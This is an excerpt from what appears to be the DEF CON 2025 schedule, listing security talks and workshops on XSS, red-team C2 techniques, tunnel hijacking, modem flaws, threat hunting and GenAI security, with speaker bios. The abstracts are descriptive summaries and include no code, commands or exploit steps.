SpeakerBio:  Adam Pennington, ATT&CK Lead at The MITRE Corporation

Adam Pennington leads ATT&CK at The MITRE Corporation and collected much of the intelligence leveraged in creating ATT&CK’s initial techniques. He has spent much of his 15 years with MITRE studying and preaching the use of deception for intelligence gathering. Prior to joining MITRE, Adam was a researcher at Carnegie Mellon's Parallel Data Lab and earned his BS and MS degrees in Computer Science and Electrical and Computer Engineering from Carnegie Mellon University. Adam has presented and published in several venues including FIRST CTI, USENIX Security, DEF CON, and ACM Transactions on Information and System Security.

SpeakerBio:  Sydney Marrone, Threat hunter at Splunk

Sydney is a threat hunter, co-author of the PEAK Threat Hunting Framework, and co-founder of THOR Collective. A proud thrunter, she is dedicated to advancing the craft of threat hunting through hands-on research, open-source collaboration, and community-driven initiatives like HEARTH (Hunting Exchange And Research Threat Hub). When not hunting threats, she’s crafting content for THOR Collective Dispatch, lifting weights, and keeping the hacker spirit alive.

SpeakerBio:  Lauren Proehl, Global Head of Detection and Response at Marsh McLennan, Co-Founder at THOR Collective

Lauren Proehl is the Global Head of Detection and Response at Marsh McLennan. She is an experienced incident responder and threat hunter who has helped identify and mitigate cyber adversaries in Fortune 500 networks. After leading investigations ranging from data breaches to targeted attacks, she now works to define some part of the limitless unknowns in cyberspace and make cybersecurity less abstract, and more tangible. Lauren sits on the CFP board for BSides Kansas City, heads up SecKC parties, and tries to escape computers by running long distances in the woods.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Saturday - 12:00-12:59 PDT


Title: From Component to Compromised: XSS via React createElement
When: Saturday, Aug 9, 12:00 - 12:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

XSS in modern React apps isn't gone, it's just hiding in new places. In this workshop, we'll expose how React createElement can be your way in. We'll walk through several React DOM XSS lab scenarios based on real bug bounty findings from vulnerable applications in the wild. You'll see how untrusted input can make its way from a variety of realistic sources to a React createElement sink, leading to exploitable XSS, even in apps built with frameworks like Next.js. These labs are realistic, grounded in actual bugs, and designed to sharpen your ability to spot and exploit DOM XSS in the kinds of apps bounty hunters hit every day.

SpeakerBio:  Nick Copi

Nick Copi is an AppSec engineer and active bug bounty hunter who regularly submits high signal findings to notable companies. He has a diverse technical background, including building and hosting infrastructure and challenges for a couple dozen capture the flag or other offensive hands-on training lab events. He is a member of the CTBB Full Time Hunter's Guild, and an active contributor to the online bug bounty space, always eager to share interesting ideas around other people's "nearly exploitable bugs" as well as novel attack scenarios. His hobbies include debugging minified JavaScript, grepping Blink source in hopes of discovering magical undocumented behaviors, and doing pull ups on iframe jungle gyms.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 15:00-15:50 PDT


Title: From Prey to Playbook: Learning about victim behavior from infostealer logs
When: Saturday, Aug 9, 15:00 - 15:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 1 - Map

Description:

In this hands-on workshop, participants will analyze anonymized infostealer logs to uncover the human vulnerabilities that make these attacks successful. Using privacy-preserved datasets, attendees will reverse-engineer victim decision patterns, identify high-value behavioral triggers, and craft precision-targeted attack sequences based on real-world data.

SpeakerBio:  Megan Squire

Dr. Megan Squire is a researcher in cyber threat intelligence at F-Secure, a consumer-facing cybersecurity software company that focuses on scam protection. Her work tracing illicit finance and extremist influence networks has been featured in hundreds of publications including WIRED, the BBC, NPR, and Frontline.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 14:00-17:59 PDT


Title: From Prompt to Protection: A Practical Guide to Building and Securing Generative AI Applications
When: Saturday, Aug 9, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N254 - Map

Description:

This hands-on workshop explores the offensive and defensive security challenges of Generative AI (GenAI). In the first half, participants will use structured frameworks and rapid threat prototyping to map out real-world GenAI risks such as - prompt injection, data poisoning, and model leakage. Working in teams, you'll threat model a GenAI system using simplified STRIDE and Rapid threat prototyping techniques and visual diagrams.

The second half flips the script: you'll build lightweight security tools that harness GenAI for good crafting utilities. No prior AI experience is required; everything is explained as we go.

This workshop is ideal for red teamers, security engineers, and curious builders. Just bring basic Python familiarity and a laptop - we’ll supply the rest.

You’ll walk away with real-world threat models, working tool prototypes, and a clear framework for breaking and securing AI systems in your org.

Speakers:Ashwin Iyer,Ritika Verma

SpeakerBio:  Ashwin Iyer, Visa Inc - M&A Security Architecture (Director)

Ashwin Iyer is a cybersecurity architect with 12+ years of experience across red teaming, threat modeling, and cloud security. He currently leads offensive security for mergers and acquisitions at Visa Inc., conducting advanced penetration tests and threat evaluations of critical financial infrastructure.

Previously at SAP Ariba, he built and led the red team program, developing internal CTFs, defining SOC SLAs, and identifying high-impact vulnerabilities across global B2B platforms.

Ashwin is an EC-Council CodeRed instructor (Session Hijacking & Prevention), a reviewer for Hands-On Red Team Tactics (Packt), and a contributor to PCI SSC’s segmentation guidance for modern networks. He has delivered hands-on workshops at BSidesSF, HackGDL, and Pacific Hackers on topics like GenAI threat modeling, Practical Threat Modeling for Agile.

He holds certifications including OSCP, OSEP, GCPN, OSMR, CTMP and few others. When not hacking cloud platforms or vendor portals, he’s mentoring teams on how to think like attackers.

SpeakerBio:  Ritika Verma, AI Security Research Assistant

Ritika Verma is a cybersecurity engineer and AI security researcher with 7.5+ years of experience across enterprise security, cloud infrastructure, and applied AI. She has led security initiatives at SAP and Accenture, where she implemented MITRE ATT&CK frameworks, automated detection pipelines, and secured large-scale IAM and DLP environments.

Currently pursuing her MS in Information Systems with an AI/ML focus at Santa Clara University, Ritika researches LLM security, RAG pipelines, and GenAI abuse patterns. Her open-source projects — including an AWS vulnerability triage agent (VISTA), a RAG-based compliance engine, and a CI/CD DevSecOps pipeline — reflect her obsession with bridging security engineering and real-world AI applications.

She has placed 2nd in a Pre-Defcon CTF hosted at Google, mentored future security talent through WiCyS and NIST/NICE, and served as President of the SCU AI Club. Ritika is passionate about building secure-by-default systems, mentoring women in cybersecurity, and rethinking how LLMs are evaluated and abused in production environments.


Return to Index    -    Add to Google    -    ics Calendar file

PSV - Saturday - 12:00-12:59 PDT


Title: From Pwn to Plan: Turning Physical Exploits Into Upgrades
When: Saturday, Aug 9, 12:00 - 12:59 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

Everyone loves breaking in—but that’s just step 7 out of 10. This session explores what it really takes to run a physical pen test that's not just exciting, but also safe, smart, and worth the money for your company or client. We'll follow the full journey - from breach-focused OSINT and recon, to delivering findings that teams act on. Expect war stories, dumb mistakes, and smart takeaways as you learn how to turn a good break-in into a lasting impact.

SpeakerBio:  Shawn

Too many security programs bring a clipboard to a gunfight. Shawn helps companies match and defend against the adversary's tactics - no firearms required. As an adversary for hire, Shawn leads physical red teams that test Fortune 100s, government agencies, and critical infrastructure. He started the largest physical red team in Silicone Valley and teaches security risk management and red teaming to cybersecurity graduate students. From fake badges to forged businesses, kidnapping executives to smuggling weapons, he runs ops that find the gaps in physical security before the bad guys do.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 10:00-10:20 PDT


Title: From Shanghai to the Shore: The Silent Threat in Global Shipping
When: Sunday, Aug 10, 10:00 - 10:20 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Ship-to-shore cranes manufactured in China have faced increased scrutiny from the United States Congress in the past year due to concerns about potential supply chain vulnerabilities, pricing practices, and the global dependence on these critical infrastructure components produced by Chinese state-owned companies.

Coast Guard Cyber Protection Teams (CPTs) have been the US government’s primary resource doing technical cybersecurity work on these cranes – to include assessment, threat hunting, and incident response operations. This talk discusses findings and recommendations from over 350 days of crane missions conducted by US Coast Guard CPTs, to include the existence of surprise cellular modems and potential attack paths.

References:

Speakers:Kenneth Miltenberger,Nicholas Fredericksen

SpeakerBio:  Kenneth Miltenberger

Lieutenant Commander Kenny Miltenberger currently serves as the first Commanding Officer of the 2003 Cyber Protection Team (CPT) in Alameda, CA. He is responsible for protecting the nation’s Marine Transportation System in cyberspace by conducting hunt, assess, and incident response operations. His team is the Coast Guard’s newest CPT and the only CPT geographically detached from Coast Guard Cyber Command (CGCYBER).

Kenny recently completed an assignment where he founded the Coast Guard’s Red Team and ran the Coast Guard's Blue Team (cooperative assessments). During that tour he founded CGCYBER’s educational phishing capability, led cyber Opposing Forces for a major multinational exercise, and oversaw over 100 Red and Blue Team missions during his tour. Other notable positions include his work as an engineer for the U.S. Navy’s Naval Sea Systems Command, where he was a developer on a shipboard cyber security platform.

Kenny has a BS in Electrical Engineering from the Coast Guard Academy and an MS Electrical Engineering from University of Maryland College Park.

Kenny has also worked as part-time faculty at University of Maryland, College Park, where he taught Binary Exploitation in their Cyber Masters Program. Industry certifications include OSCP, GXPN, GCPN, GREM, GPEN, GNFA, GCIH, GISP, and CISSP.

SpeakerBio:  Nicholas Fredericksen

Lieutenant Commander (LCDR) Nick Fredericksen currently serves as the first Commanding Officer of the 1790 Cyber Protection Team (CPT) in Washington, DC. He is responsible for protecting the nation’s Marine Transportation System (MTS) in cyberspace by conducting assess, hunt, and incident response operations. The 1790 CPT is the Coast Guard’s first CPT, reaching full operational status in Spring 2021.

Nick's previous assignment was Deputy of Coast Guard Cyber Command’s Maritime Cyber Readiness Branch. His primary duties included leading a team of marine safety professionals trained in cybersecurity and dedicated to raising the consistency, competency, and capabilities of cybersecurity in the MTS. This included cybersecurity incident investigations; studying the Techniques, Tactics, and Procedures of threat actors; and providing critical stakeholders awareness publications and information sharing.

Other notable assignments include conducting IT project management where he led the Coast Guard’s first service migration to a modernized, software-as-a-service managed solution.

Nick has a BS degree in Operations Research and Computer Analysis and an MS in Information Systems Management from Florida Institute of Technology.

His cybersecurity certifications include CISSP, GCIH, GICSP, GCFA, and GPEN.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 15:00-15:45 PDT


Title: From Spoofing to Tunneling: New Red Team's Networking Techniques for Initial Access and Evasion
When: Friday, Aug 8, 15:00 - 15:45 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Gaining initial access to an intranet is one of the most challenging parts of red teaming. If an attack chain is intercepted by an incident response team, the entire operation must be restarted. In this talk, we introduce a technique for gaining initial access to an intranet that does not involve phishing, exploiting public-facing applications, or having a valid account. Instead, we leverage the use of stateless tunnels, such as GRE and VxLAN, which are widely used by companies like Cloudflare and Amazon. This technique affects not only Cloudflare's customers but also other companies.

Additionally, we will share evasion techniques that take advantage of company intranets that do not implement source IP filtering, preventing IR teams from intercepting the full attack chain. Red teamers could confidently perform password spraying within an internal network without worrying about losing a compromised foothold. Also, we will reveal a nightmare of VxLAN in Linux Kernel and RouterOS. This affects many companies, including ISPs. This feature is enabled by default and allows anyone to hijack the entire tunnel, granting intranet access, even if the VxLAN is configured on a private IP interface through an encrypted tunnel. What's worse, RouterOS users cannot disable this feature. This problem can be triggered simply by following the basic VxLAN official tutorial. Furthermore, if the tunnel runs routing protocols like BGP or OSPF, it can lead to the hijacking of internal IPs, which could result in domain compromises. We will demonstrate the attack vectors that red teamers can exploit after hijacking a tunnel or compromising a router by manipulating the routing protocols.

Lastly, we will conclude the presentation by showing how companies can mitigate these vulnerabilities. Red teamers can use these techniques and tools to scan targets and access company intranets. This approach opens new avenues for further research.

References:

I have seen discussions about source IP address spoofing with stateless tunnels, similar to research on CVE-2020-10136 which uses IPIP tunnels. However, this research omits the possibility of using stateless tunnels for initial access. The PoC only provides methods to launch DoS attacks such as UDP flooding, TCP SYN attacks, and ARP spoofing, which do not require a response. Notably, there is no method to find a stateless tunnel in previous research, making real-world attacks impractical.

SpeakerBio:  Shu-Hao, Tung 123ojp

Shu Hao, Tung (123ojp), a Threat Researcher at Trend Micro, specializing in Red Teaming. He mainly focuses on web, networking, and infrastructure vulnerabilities. He owns an ASN and is a bug hunter who has reported high-risk vulnerabilities via Bugcrowd.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 15:00-15:50 PDT


Title: From USB to C2
When: Friday, Aug 8, 15:00 - 15:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 2 - Map

Description:

In this workshop, participants will build and deploy a USB-based intrusion framework: crafting a malicious USB payload, developing a lightweight information-stealing stager, and using the resulting data to deploy a Mythic C2 beacon. The session also covers provisioning and configuring an AWS-hosted command-and-control environment. Attendees will leave with hands-on experience in both the offensive implant and its supporting cloud infrastructure.

SpeakerBio:  Will McGraw

Will McGraw is a security professional with a background that spans help desk support, security and compliance consulting, and hands-on offensive security. Currently working as a pentester, he focuses on creative attack paths to achieve initial access and persistence in client environments. With over four years in the industry, they bring practical experience and a hacker’s mindset to their research.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Sunday - 11:00-11:30 PDT


Title: Full Disclosure, Full Color: Badge-making story of this year's BBV badge
When: Sunday, Aug 10, 11:00 - 11:30 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

This talk pulls the curtain on the behind-the-scenes badge-making story of the second official Bug Bounty Village badge. A fascinating and intricate blend of interactive electronics, layered PCB prints, and Matrix-style LED effects, all wrapped around an engaging CTF.

SpeakerBio:  Abhinav Pandagale, Founder at Hackerware.io

Abhinav's artistry comes from the times he used to sneakily paint drawings made by his sister. His hacking career began as a toddler, disassembling his toys but never put them back together. His entrepreneurial roots come from selling snacks at a school fair and making a loss of . Having learned how not to make money, he launched Hackerware.io - a boutique badgelife lab with in-house manufacturing - which has grown over the past nine years into a global presence across 19 countries. He’s often spotted at conferences around the world - hosting hardware villages or pulling off the kind of random shenanigans that earned him the Sin CON Person of the Year 2025 award.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Full-Stack Pentesting Laboratory: 100% Hands-On + Lifetime LAB Access
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Modern IT systems are complex and it’s all about full-stack nowadays. To become a pentesting expert, you need to dive into full-stack exploitation and gain a lot of practical skills. That’s why I created the Full-Stack Pentesting Laboratory.

For each attack, vulnerability and technique presented in this training there is a lab exercise to help you master full-stack pentesting step by step. What’s more, when the training is over, you can take the complete lab environment home to hack again at your own pace.

I found security bugs in many companies including Google, Yahoo, Mozilla, Twitter and in this training I’ll share my experience with you. The content of this training has been carefully selected to cover the topics most frequently requested by professional penetration testers.

Note: This training was sold out at DEF CON 2024 and received very positive feedback from students. That’s why we're bringing it back to Las Vegas for DEF CON 2025.

SpeakerBio:  Dawid Czagan, Founder and CEO at Silesia Security Lab

Dawid Czagan is an internationally recognized security researcher and trainer. He is listed among top hackers at HackerOne. Dawid Czagan has found security bugs in Apple, Google, Mozilla, Microsoft and many others. Due to the severity of many bugs, he received numerous awards for his findings.

Dawid Czagan shares his offensive security experience in his hands-on trainings. He delivered trainings at key industry conferences such as DEF CON (Las Vegas), Hack In The Box (Amsterdam), CanSecWest (Vancouver), 44CON (London), Hack In Paris (Paris), NorthSec (Montreal), HITB GSEC (Singapore), BruCON (Ghent) and for many corporate clients. His students include security specialists from Oracle, Adobe, ESET, ING, Red Hat, Trend Micro, Philips and government sector (references are attached to Dawid Czagan's LinkedIn profile (https://www.linkedin.com/in/dawid-czagan-85ba3666/). They can also be found here: https://silesiasecuritylab.com/services/training/#opinions).

Dawid Czagan is the founder and CEO at Silesia Security Lab. To find out about the latest in his work, you are invited to subscribe to his newsletter (https://silesiasecuritylab.com/newsletter) and follow him on Twitter (@dawidczagan), YouTube (https://www.youtube.com/channel/UCG-sIlaM1xXmetFtEfqtOqg), and LinkedIn (https://www.linkedin.com/in/dawid-czagan-85ba3666/).


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Full-Stack Pentesting Laboratory: 100% Hands-On + Lifetime LAB Access
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Modern IT systems are complex and it’s all about full-stack nowadays. To become a pentesting expert, you need to dive into full-stack exploitation and gain a lot of practical skills. That’s why I created the Full-Stack Pentesting Laboratory.

For each attack, vulnerability and technique presented in this training there is a lab exercise to help you master full-stack pentesting step by step. What’s more, when the training is over, you can take the complete lab environment home to hack again at your own pace.

I found security bugs in many companies including Google, Yahoo, Mozilla, Twitter and in this training I’ll share my experience with you. The content of this training has been carefully selected to cover the topics most frequently requested by professional penetration testers.

Note: This training was sold out at DEF CON 2024 and received very positive feedback from students. That’s why we're bringing it back to Las Vegas for DEF CON 2025.

SpeakerBio:  Dawid Czagan, Founder and CEO at Silesia Security Lab

Dawid Czagan is an internationally recognized security researcher and trainer. He is listed among top hackers at HackerOne. Dawid Czagan has found security bugs in Apple, Google, Mozilla, Microsoft and many others. Due to the severity of many bugs, he received numerous awards for his findings.

Dawid Czagan shares his offensive security experience in his hands-on trainings. He delivered trainings at key industry conferences such as DEF CON (Las Vegas), Hack In The Box (Amsterdam), CanSecWest (Vancouver), 44CON (London), Hack In Paris (Paris), NorthSec (Montreal), HITB GSEC (Singapore), BruCON (Ghent) and for many corporate clients. His students include security specialists from Oracle, Adobe, ESET, ING, Red Hat, Trend Micro, Philips and government sector (references are attached to Dawid Czagan's LinkedIn profile (https://www.linkedin.com/in/dawid-czagan-85ba3666/). They can also be found here: https://silesiasecuritylab.com/services/training/#opinions).

Dawid Czagan is the founder and CEO at Silesia Security Lab. To find out about the latest in his work, you are invited to subscribe to his newsletter (https://silesiasecuritylab.com/newsletter) and follow him on Twitter (@dawidczagan), YouTube (https://www.youtube.com/channel/UCG-sIlaM1xXmetFtEfqtOqg), and LinkedIn (https://www.linkedin.com/in/dawid-czagan-85ba3666/).


Return to Index    -    Add to Google    -    ics Calendar file

GHV - Friday - 14:00-14:45 PDT


Title: Game Hacking 101
When: Friday, Aug 8, 14:00 - 14:45 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Intro basics about concepts in game hacking and security principles within video games.

SpeakerBio:  Julian "Julez" Dunning, Security Founder & Leader

Julian has a storied career in cybersecurity, initially focusing on offensive security. He has developed several popular open-source security tools, including statistics-based password-cracking methods. Julian also co-founded Truffle Security, creators of the widely used open-source tool TruffleHog. Recently, he established a new DEFCON village called GameHacking.GG promotes interest and awareness in-game security.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 15:00-15:45 PDT


Title: Garuda Threat Hunting Framework
When: Saturday, Aug 9, 15:00 - 15:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

The rapid growth of cyber threats has made endpoint logging a critical component of modern security operations. Defenders increasingly rely on endpoint telemetry like Sysmon logs to detect and investigate breaches. These logs capture crucial forensic evidence, but the sheer volume and complexity of Sysmon logs often overwhelm analysts and hinder timely and effective analysis. Garuda is an open-source PowerShell framework designed to address this challenge by providing a unified, flexible, and efficient approach to endpoint detection and response using Sysmon events. With advanced filtering capabilities, cross-event correlation, multiple contextual views, precise time-based noise reduction, and support for both remote and offline (EVTX) analysis, Garuda enables security teams to quickly uncover attack chains, investigate incidents, develop detection logic, and perform in-depth malware analysis all within a single, scriptable environment. Its extensible nature allows one to use it for various scenarios, including threat hunting, investigation, anomaly detection, detection engineering, and malware analysis. Garuda can accelerate investigations, improve detection, and provide deep visibility into endpoint activity.

Speakers:Monnappa "Monnappa22" K A,Sajan Shetty

SpeakerBio:  Monnappa "Monnappa22" K A, Co-Founder at Cysinfo

Monnappa K A is a Security professional with over 17 years of experience in incident response and investigation. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on threat hunting, investigation, and research of advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis." He is a review board member for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Limon Linux sandbox and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). He has conducted training sessions on malware analysis, reverse engineering, and memory forensics at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, FIRST, SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has presented at various security conferences, including Black Hat, FIRST, SEC-T, 4SICS-SCADA/ICS summit, DSCI, National Cyber Defence Summit, and Cysinfo meetings on various topics related to memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com.

SpeakerBio:  Sajan Shetty

Sajan Shetty is a Cyber Security enthusiast. He is an active member of Cysinfo, an open Cyber Security Community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, and his primary fields of interest include machine learning, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 16:00-16:45 PDT


Title: Garuda Threat Hunting Framework
When: Saturday, Aug 9, 16:00 - 16:45 PDT
Where: LVCCWest-Level2-W211 - Map

Description:

The rapid growth of cyber threats has made endpoint logging a critical component of modern security operations. Defenders increasingly rely on endpoint telemetry like Sysmon logs to detect and investigate breaches. These logs capture crucial forensic evidence, but the sheer volume and complexity of Sysmon logs often overwhelm analysts and hinder timely and effective analysis. Garuda is an open-source PowerShell framework designed to address this challenge by providing a unified, flexible, and efficient approach to endpoint detection and response using Sysmon events. With advanced filtering capabilities, cross-event correlation, multiple contextual views, precise time-based noise reduction, and support for both remote and offline (EVTX) analysis, Garuda enables security teams to quickly uncover attack chains, investigate incidents, develop detection logic, and perform in-depth malware analysis all within a single, scriptable environment. Its extensible nature allows one to use it for various scenarios, including threat hunting, investigation, anomaly detection, detection engineering, and malware analysis. Garuda can accelerate investigations, improve detection, and provide deep visibility into endpoint activity.

Speakers:Monnappa "Monnappa22" K A,Sajan Shetty

SpeakerBio:  Monnappa "Monnappa22" K A, Co-Founder at Cysinfo

Monnappa K A is a Security professional with over 17 years of experience in incident response and investigation. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on threat hunting, investigation, and research of advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis." He is a review board member for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Limon Linux sandbox and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). He has conducted training sessions on malware analysis, reverse engineering, and memory forensics at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, FIRST, SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has presented at various security conferences, including Black Hat, FIRST, SEC-T, 4SICS-SCADA/ICS summit, DSCI, National Cyber Defence Summit, and Cysinfo meetings on various topics related to memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com.

SpeakerBio:  Sajan Shetty

Sajan Shetty is a Cyber Security enthusiast. He is an active member of Cysinfo, an open Cyber Security Community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, and his primary fields of interest include machine learning, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 15:00-15:45 PDT


Title: Gateways to Chaos - How We Proved Modems Are a Ticking Time Bomb That Hackers Can Access Everywhere
When: Friday, Aug 8, 15:00 - 15:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

Imagine your home modem as a loaded gun aimed at global security. Our research exposes critical vulnerabilities in ISP-supplied modems—ADSL, fiber, cable, 5G—that inherently threaten power grids, water systems, and ATMs. Over 35 severe flaws have been identified, rooted in outdated IoT SDKs, affecting millions globally. These issues allow attackers to manipulate essential services without direct hijacking.

Despite the severity of these vulnerabilities, manufacturers and ISPs consistently refuse to address them, leaving these devices as perpetual threats. We provide essential tools for detection and defense against such negligence.

In this session, you'll learn how to identify these inherent weaknesses that compromise infrastructures through device flaws. Gain practical skills in vulnerability hunting and crafting defenses, while navigating the landscape of responsible disclosure amidst industry inertia.

Join us to confront a crisis long ignored. When hackers exploit these systemic failures, it's not just personal data at risk—it's the stability of our world's crucial infrastructure.

References:

SpeakerBio:  Chiao-Lin "Steven Meow" Yu, Threat Researcher at Trend Micro Red Team

Chiao-Lin Yu (Steven Meow) currently serves as a Red Team Cyber Threat Researcher at Trend Micro. He holds numerous professional certifications including OSCE³ , OSEP, OSWE, OSED, OSCP, CRTP, CARTP, CESP-ADCS, LTP, CPENT, GCP ACE. Steven has previously presented at events such as Security BSides Tokyo 2023, HITCON Bounty House, and CYBERSEC 2024, 2025. He has disclosed 20+ CVE vulnerabilities in major companies like VMware, D-Link, and Zyxel. His expertise spans red team exercises, web security and IoT security.


Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Saturday - 11:00-11:59 PDT


Title: GenAI red teaming for Payment Fraud
When: Saturday, Aug 9, 11:00 - 11:59 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

In this talk we will outline the various layers of security in payment systems and using generative AI for "fuzz testing" these systems. We will cover image and video manipulation, testing unusual combinations of security elements in payment messages and testing various risky behaviour scenarios in common payment types in both fraud and money laundering scenarios.

Speakers:Karthik Tadinada,Martyn Higson

SpeakerBio:  Karthik Tadinada, Fortify Solutions

Karthik is the founder and CEO of Fortify Solutions, a provider of fraud and financial crime prevention solutions. Karthik has over a dozen years of experience in building fraud prevention systems at international scale, having built systems for IATA, EFhe debit card network of Australia), TSYS and WorldPay.

SpeakerBio:  Martyn Higson, CTO at Fincrime Dynamics

Martyn is CTO at Fincrime Dynamics, a synthetic data company for prevention of fraud and financial crime. Martyn has been responsible for deploying major fraud prevention systems in his prior roles at Featurespace.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 12:00-12:50 PDT


Title: Getting Caught in Offensive Security
When: Saturday, Aug 9, 12:00 - 12:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 2 - Map

Description:

War stories and bad moves from those in the field.

Speakers:Graham Helton,Kevin Clark,Red Team Village Staff,Skyler Knecht

SpeakerBio:  Graham Helton

Graham Helton is currently a Red Team Specialist at Google specializing in Linux exploitation. Graham posts frequently on his website grahamhelton.com with deep dives on various security related topics. In his free time he likes to pretend like he knows what he’s doing, coffee, and cooking.

SpeakerBio:  Kevin Clark, Red Team Instructor at BC Security

Kevin Clark is a Security Consultant with TrustedSec and a Red Team Instructor with BC Security, with a diverse background in software development, penetration testing, and offensive security operations. Kevin specializes in initial access techniques and Active Directory exploitation. He has contributed to open-source projects such as PowerShell Empire and developed custom security toolkits, including Badrats and Ek47. A skilled trainer and speaker, Kevin has delivered talks and conducted training sessions all over the country at cybersecurity conferences, including Black Hat and DEF CON, and authors a cybersecurity blog at https://henpeebin.com/kevin/blog.

SpeakerBio:  Red Team Village Staff
No BIO available
SpeakerBio:  Skyler Knecht

Skyler is a Senior Security consultant at SpecterOps, where he performs security assessments for Fortune 500 organizations. With over six years of experience, he focuses on initial access research and contributes to the security community through open-source development and conference presentations. Skyler has presented at DEF CON and BSides and actively collaborates on open-source projects such as Messenger, Ek47, Connect, and Metasploit. He also conducts vulnerability research, having discovered multiple zero-day vulnerabilities in enterprise software.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 10:00-12:59 PDT


Title: Getting started in Malware Analysis with Ghidra
When: Friday, Aug 8, 10:00 - 12:59 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Wesley McGrew

Dr. Wesley McGrew is a house music DJ that also directs research, development, and offensive cyber operations as Senior Cybersecurity Fellow for MartinFederal. He has presented on topics of penetration testing and malware analysis at DEF CON and Black Hat USA and teaches self-designed courses on software reverse engineering and assembly language programming. Wesley has a Ph.D. in Computer Science from Mississippi State University for his research in vulnerability analysis of SCADA HMI systems.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 12:00-12:45 PDT


Title: Ghost Calls: Abusing Web Conferencing for Covert Command & Control
When: Friday, Aug 8, 12:00 - 12:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

Red teams often struggle with interactive C2 in monitored networks. Low-and-slow channels are stealthy but insufficient for high-bandwidth tasks like SOCKS proxying, pivoting, or hidden VNC. Our research solves this by using real-time collaboration protocols—specifically, whitelisted media servers from services like Zoom—to create short-term, high-speed C2 channels that blend into normal enterprise traffic.

We introduce TURNt, an open-source tool that automates covert traffic routing via commonly trusted TURN servers. Since many enterprises whitelist these conferencing IPs and exempt them from TLS inspection, TURNt sessions look just like a legitimate Zoom meeting. Operators can maintain a persistent, stealthy channel while periodically activating higher-bandwidth interactivity for time-sensitive operations.

This talk will show how to set up these “ghost calls,” discuss the trade-offs and detection challenges, and explore defensive countermeasures. Attendees will learn how to integrate short-term, real-time C2 into existing red team workflows—and how to identify and mitigate this emerging threat.

References:

SpeakerBio:  Adam "UNC1739" Crosser, Staff Security Engineer at Praetorian

Adam Crosser is a Staff Security Engineer at Praetorian, specializing in offensive security research and tooling development. He began his career in red team operations, honing his skills in adversary simulation and advanced attack techniques. Now part of the Praetorian Labs team, Adam focuses on vulnerability research, exploit development, and building custom offensive security capabilities to support red team engagements—pushing the boundaries of adversary tradecraft.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 12:30-13:15 PDT


